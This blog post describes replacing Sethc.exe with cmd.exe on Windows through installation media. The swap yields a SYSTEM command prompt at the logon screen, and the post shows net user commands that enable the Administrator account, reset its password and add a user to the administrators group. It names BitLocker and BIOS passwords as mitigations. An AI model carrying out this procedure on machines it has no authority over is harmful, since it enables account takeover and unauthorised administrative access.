It is a easy way for users to become an administrator of a workstation, member server or domain controller if there is no additional security setting like BitLocker Drive Encryption. "Sethc.exe" is a function to enable sticky keys. When a user press "Shift" five times on the log on screen, Windows show a pop-up window which is related to "Sticky Keys".
"Sethc.exe" can be replaced "CMD.exe" by someone on per-boot Windows environment. How to do it? Let's see the following steps.
1. Boot your computer and use a Windows installation disc. (It can be a USB flash drive or a DVD).
2. On "Install Windows" screen, press "Shift + F10" to launch a Command Prompt.
3. Perform "copy D:\Windows\System32\Sethc.exe D:\" a command to copy "Sethc.exe" to D drive. In my lab environment, Windows folder is under D:\.
4. Perform "Copy D:\Windows\System32\cmd.exe D:\Windows\System32\Sethc.exe /y" to copy and replace "Sethc.exe" by "CMD.exe".
5. Exit the Command Prompt.
6. Restart the workstation.
7. On "Windows" log on screen, press "Shift" five times.
A Command Prompt was launched.
8. Perform "whoami" to check current user of this Command Prompt.
The right of NT authority\system is same as local administrator.
Now, this user can perform "net user administrator /active:yes" to enable administrator account.
Then, the user also can perform "net user administrator abcd1234" to change the password of local administrator.
Or perform "net localgroup administrators /add userb" add "Userb" to a local administrator group.
To prevent this issue, administrators can deploy bitlocker on all workstations and they can also configure a password on a BIOS to prevent someone to boot from a USB flash drive or a DVD.
Windows 8 and Windows 8.1 also find this same issue.
Additional information
Additional information
You can also use the above steps to reset Windows Domain Administrator password.
Vladan SETGET, vExpert of VMWare, wrote detail steps for resetting Windows Domain Administrator password. if you're interested, please read How-to Reset Windows Domain Administrator Password.
Vladan SETGET, vExpert of VMWare, wrote detail steps for resetting Windows Domain Administrator password. if you're interested, please read How-to Reset Windows Domain Administrator Password.
This posting is provided “AS IS” with no warranties, and confers no rights!
No comments:
Post a Comment